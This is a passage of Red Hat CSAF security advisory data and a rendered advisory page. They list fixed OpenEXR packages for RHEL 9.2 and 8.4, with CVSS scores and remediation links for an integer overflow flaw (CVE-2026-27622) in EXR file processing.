"product_id": "openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs-debuginfo@3.1.1-2.el9_2.2?arch=s390x"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.1-2.el9_2.2.aarch64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)",
"product_id": "AppStream-9.2.0.Z.E4S:openexr-0:3.1.1-2.el9_2.2.aarch64"
},
"product_reference": "openexr-0:3.1.1-2.el9_2.2.aarch64",
"relates_to_product_reference": "AppStream-9.2.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.1-2.el9_2.2.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)",
"product_id": "AppStream-9.2.0.Z.E4S:openexr-0:3.1.1-2.el9_2.2.ppc64le"
},
"product_reference": "openexr-0:3.1.1-2.el9_2.2.ppc64le",
"relates_to_product_reference": "AppStream-9.2.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.1-2.el9_2.2.s390x as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)",
"product_id": "AppStream-9.2.0.Z.E4S:openexr-0:3.1.1-2.el9_2.2.s390x"
},
"product_reference": "openexr-0:3.1.1-2.el9_2.2.s390x",
"relates_to_product_reference": "AppStream-9.2.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.1-2.el9_2.2.src as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)",
"product_id": "AppStream-9.2.0.Z.E4S:openexr-0:3.1.1-2.el9_2.2.src"
},
"product_reference": "openexr-0:3.1.1-2.el9_2.2.src",
"relates_to_product_reference": "AppStream-9.2.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.1-2.el9_2.2.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)",
"product_id": "AppStream-9.2.0.Z.E4S:openexr-0:3.1.1-2.el9_2.2.x86_64"
},
"product_reference": "openexr-0:3.1.1-2.el9_2.2.x86_64",
"relates_to_product_reference": "AppStream-9.2.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.1-2.el9_2.2.aarch64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)",
"product_id": "AppStream-9.2.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_2.2.aarch64"
},
"product_reference": "openexr-debuginfo-0:3.1.1-2.el9_2.2.aarch64",
"relates_to_product_reference": "AppStream-9.2.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.1-2.el9_2.2.i686 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)",
"product_id": "AppStream-9.2.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_2.2.i686"
},
"product_reference": "openexr-debuginfo-0:3.1.1-2.el9_2.2.i686",
"relates_to_product_reference": "AppStream-9.2.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.1-2.el9_2.2.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)",
"product_id": "AppStream-9.2.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_2.2.ppc64le"
},
"product_reference": "openexr-debuginfo-0:3.1.1-2.el9_2.2.ppc64le",
"relates_to_product_reference": "AppStream-9.2.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.1-2.el9_2.2.s390x as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)",
"product_id": "AppStream-9.2.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_2.2.s390x"
},
"product_reference": "openexr-debuginfo-0:3.1.1-2.el9_2.2.s390x",
"relates_to_product_reference": "AppStream-9.2.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.1-2.el9_2.2.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)",
"product_id": "AppStream-9.2.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_2.2.x86_64"
},
"product_reference": "openexr-debuginfo-0:3.1.1-2.el9_2.2.x86_64",
"relates_to_product_reference": "AppStream-9.2.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.1-2.el9_2.2.aarch64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)",
"product_id": "AppStream-9.2.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_2.2.aarch64"
},
"product_reference": "openexr-debugsource-0:3.1.1-2.el9_2.2.aarch64",
"relates_to_product_reference": "AppStream-9.2.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.1-2.el9_2.2.i686 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)",
"product_id": "AppStream-9.2.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_2.2.i686"
},
"product_reference": "openexr-debugsource-0:3.1.1-2.el9_2.2.i686",
"relates_to_product_reference": "AppStream-9.2.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.1-2.el9_2.2.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)",
"product_id": "AppStream-9.2.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_2.2.ppc64le"
},
"product_reference": "openexr-debugsource-0:3.1.1-2.el9_2.2.ppc64le",
"relates_to_product_reference": "AppStream-9.2.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.1-2.el9_2.2.s390x as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)",
"product_id": "AppStream-9.2.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_2.2.s390x"
},
"product_reference": "openexr-debugsource-0:3.1.1-2.el9_2.2.s390x",
"relates_to_product_reference": "AppStream-9.2.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.1-2.el9_2.2.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)",
"product_id": "AppStream-9.2.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_2.2.x86_64"
},
"product_reference": "openexr-debugsource-0:3.1.1-2.el9_2.2.x86_64",
"relates_to_product_reference": "AppStream-9.2.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.1-2.el9_2.2.aarch64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)",
"product_id": "AppStream-9.2.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_2.2.aarch64"
},
"product_reference": "openexr-libs-0:3.1.1-2.el9_2.2.aarch64",
"relates_to_product_reference": "AppStream-9.2.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.1-2.el9_2.2.i686 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)",
"product_id": "AppStream-9.2.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_2.2.i686"
},
"product_reference": "openexr-libs-0:3.1.1-2.el9_2.2.i686",
"relates_to_product_reference": "AppStream-9.2.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.1-2.el9_2.2.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)",
"product_id": "AppStream-9.2.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_2.2.ppc64le"
},
"product_reference": "openexr-libs-0:3.1.1-2.el9_2.2.ppc64le",
"relates_to_product_reference": "AppStream-9.2.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.1-2.el9_2.2.s390x as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)",
"product_id": "AppStream-9.2.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_2.2.s390x"
},
"product_reference": "openexr-libs-0:3.1.1-2.el9_2.2.s390x",
"relates_to_product_reference": "AppStream-9.2.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.1-2.el9_2.2.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)",
"product_id": "AppStream-9.2.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_2.2.x86_64"
},
"product_reference": "openexr-libs-0:3.1.1-2.el9_2.2.x86_64",
"relates_to_product_reference": "AppStream-9.2.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.aarch64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)",
"product_id": "AppStream-9.2.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.aarch64"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.aarch64",
"relates_to_product_reference": "AppStream-9.2.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.i686 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)",
"product_id": "AppStream-9.2.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.i686"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.i686",
"relates_to_product_reference": "AppStream-9.2.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)",
"product_id": "AppStream-9.2.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.ppc64le"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.ppc64le",
"relates_to_product_reference": "AppStream-9.2.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.s390x as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)",
"product_id": "AppStream-9.2.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.s390x"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.s390x",
"relates_to_product_reference": "AppStream-9.2.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)",
"product_id": "AppStream-9.2.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.x86_64"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.x86_64",
"relates_to_product_reference": "AppStream-9.2.0.Z.E4S"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-27622",
"cwe": {
"id": "CWE-190",
"name": "Integer Overflow or Wraparound"
},
"discovery_date": "2026-03-03T23:02:15.379586+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2444251"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in OpenEXR, an image storage format library for the motion picture industry. An attacker can craft a malicious EXR file that, when processed, causes an integer overflow in the `CompositeDeepScanLine::readPixels` function. This overflow leads to an undersized buffer allocation, which can then be overrun during write operations. Successful exploitation could result in arbitrary code execution or a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-9.2.0.Z.E4S:openexr-0:3.1.1-2.el9_2.2.aarch64",
"AppStream-9.2.0.Z.E4S:openexr-0:3.1.1-2.el9_2.2.ppc64le",
"AppStream-9.2.0.Z.E4S:openexr-0:3.1.1-2.el9_2.2.s390x",
"AppStream-9.2.0.Z.E4S:openexr-0:3.1.1-2.el9_2.2.src",
"AppStream-9.2.0.Z.E4S:openexr-0:3.1.1-2.el9_2.2.x86_64",
"AppStream-9.2.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_2.2.aarch64",
"AppStream-9.2.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_2.2.i686",
"AppStream-9.2.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_2.2.ppc64le",
"AppStream-9.2.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_2.2.s390x",
"AppStream-9.2.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_2.2.x86_64",
"AppStream-9.2.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_2.2.aarch64",
"AppStream-9.2.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_2.2.i686",
"AppStream-9.2.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_2.2.ppc64le",
"AppStream-9.2.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_2.2.s390x",
"AppStream-9.2.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_2.2.x86_64",
"AppStream-9.2.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_2.2.aarch64",
"AppStream-9.2.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_2.2.i686",
"AppStream-9.2.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_2.2.ppc64le",
"AppStream-9.2.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_2.2.s390x",
"AppStream-9.2.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_2.2.x86_64",
"AppStream-9.2.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.aarch64",
"AppStream-9.2.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.i686",
"AppStream-9.2.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.ppc64le",
"AppStream-9.2.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.s390x",
"AppStream-9.2.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27622"
},
{
"category": "external",
"summary": "RHBZ#2444251",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444251"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27622",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27622"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622"
},
{
"category": "external",
"summary": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963",
"url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963"
}
],
"release_date": "2026-03-03T22:42:49.086000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-20T02:23:59+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"AppStream-9.2.0.Z.E4S:openexr-0:3.1.1-2.el9_2.2.aarch64",
"AppStream-9.2.0.Z.E4S:openexr-0:3.1.1-2.el9_2.2.ppc64le",
"AppStream-9.2.0.Z.E4S:openexr-0:3.1.1-2.el9_2.2.s390x",
"AppStream-9.2.0.Z.E4S:openexr-0:3.1.1-2.el9_2.2.src",
"AppStream-9.2.0.Z.E4S:openexr-0:3.1.1-2.el9_2.2.x86_64",
"AppStream-9.2.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_2.2.aarch64",
"AppStream-9.2.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_2.2.i686",
"AppStream-9.2.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_2.2.ppc64le",
"AppStream-9.2.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_2.2.s390x",
"AppStream-9.2.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_2.2.x86_64",
"AppStream-9.2.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_2.2.aarch64",
"AppStream-9.2.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_2.2.i686",
"AppStream-9.2.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_2.2.ppc64le",
"AppStream-9.2.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_2.2.s390x",
"AppStream-9.2.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_2.2.x86_64",
"AppStream-9.2.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_2.2.aarch64",
"AppStream-9.2.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_2.2.i686",
"AppStream-9.2.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_2.2.ppc64le",
"AppStream-9.2.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_2.2.s390x",
"AppStream-9.2.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_2.2.x86_64",
"AppStream-9.2.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.aarch64",
"AppStream-9.2.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.i686",
"AppStream-9.2.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.ppc64le",
"AppStream-9.2.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.s390x",
"AppStream-9.2.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:8869"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"AppStream-9.2.0.Z.E4S:openexr-0:3.1.1-2.el9_2.2.aarch64",
"AppStream-9.2.0.Z.E4S:openexr-0:3.1.1-2.el9_2.2.ppc64le",
"AppStream-9.2.0.Z.E4S:openexr-0:3.1.1-2.el9_2.2.s390x",
"AppStream-9.2.0.Z.E4S:openexr-0:3.1.1-2.el9_2.2.src",
"AppStream-9.2.0.Z.E4S:openexr-0:3.1.1-2.el9_2.2.x86_64",
"AppStream-9.2.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_2.2.aarch64",
"AppStream-9.2.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_2.2.i686",
"AppStream-9.2.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_2.2.ppc64le",
"AppStream-9.2.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_2.2.s390x",
"AppStream-9.2.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_2.2.x86_64",
"AppStream-9.2.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_2.2.aarch64",
"AppStream-9.2.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_2.2.i686",
"AppStream-9.2.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_2.2.ppc64le",
"AppStream-9.2.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_2.2.s390x",
"AppStream-9.2.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_2.2.x86_64",
"AppStream-9.2.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_2.2.aarch64",
"AppStream-9.2.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_2.2.i686",
"AppStream-9.2.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_2.2.ppc64le",
"AppStream-9.2.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_2.2.s390x",
"AppStream-9.2.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_2.2.x86_64",
"AppStream-9.2.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.aarch64",
"AppStream-9.2.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.i686",
"AppStream-9.2.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.ppc64le",
"AppStream-9.2.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.s390x",
"AppStream-9.2.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"AppStream-9.2.0.Z.E4S:openexr-0:3.1.1-2.el9_2.2.aarch64",
"AppStream-9.2.0.Z.E4S:openexr-0:3.1.1-2.el9_2.2.ppc64le",
"AppStream-9.2.0.Z.E4S:openexr-0:3.1.1-2.el9_2.2.s390x",
"AppStream-9.2.0.Z.E4S:openexr-0:3.1.1-2.el9_2.2.src",
"AppStream-9.2.0.Z.E4S:openexr-0:3.1.1-2.el9_2.2.x86_64",
"AppStream-9.2.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_2.2.aarch64",
"AppStream-9.2.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_2.2.i686",
"AppStream-9.2.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_2.2.ppc64le",
"AppStream-9.2.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_2.2.s390x",
"AppStream-9.2.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_2.2.x86_64",
"AppStream-9.2.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_2.2.aarch64",
"AppStream-9.2.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_2.2.i686",
"AppStream-9.2.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_2.2.ppc64le",
"AppStream-9.2.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_2.2.s390x",
"AppStream-9.2.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_2.2.x86_64",
"AppStream-9.2.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_2.2.aarch64",
"AppStream-9.2.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_2.2.i686",
"AppStream-9.2.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_2.2.ppc64le",
"AppStream-9.2.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_2.2.s390x",
"AppStream-9.2.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_2.2.x86_64",
"AppStream-9.2.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.aarch64",
"AppStream-9.2.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.i686",
"AppStream-9.2.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.ppc64le",
"AppStream-9.2.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.s390x",
"AppStream-9.2.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing"
}
]
}
RHSA-2026:12341
Vulnerability from csaf_redhat - Published: 2026-04-30 14:34 - Updated: 2026-05-14 22:36A flaw was found in OpenEXR, an image storage format library for the motion picture industry. An attacker can craft a malicious EXR file that, when processed, causes an integer overflow in the `CompositeDeepScanLine::readPixels` function. This overflow leads to an undersized buffer allocation, which can then be overrun during write operations. Successful exploitation could result in arbitrary code execution or a denial of service (DoS).
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-8.4.0.Z.AUS:OpenEXR-0:2.2.0-12.el8_4.1.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.4.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.4.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.4.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.4.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.4.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_4.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.4.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_4.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.4.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.4.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-0:2.2.0-12.el8_4.1.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-0:2.2.0-12.el8_4.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-0:2.2.0-12.el8_4.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for OpenEXR is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support and Red Hat Enterprise Linux 8.4 Extended Update Support Long-Life Add-On.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "OpenEXR is a high dynamic-range (HDR) image file format developed by Industrial Light \u0026 Magic for use in computer imaging applications. This package contains libraries and sample applications for handling the format. \n\nSecurity Fix(es):\n\n* openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing (CVE-2026-27622)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:12341",
"url": "https://access.redhat.com/errata/RHSA-2026:12341"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2444251",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444251"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_12341.json"
}
],
"title": "Red Hat Security Advisory: OpenEXR security update",
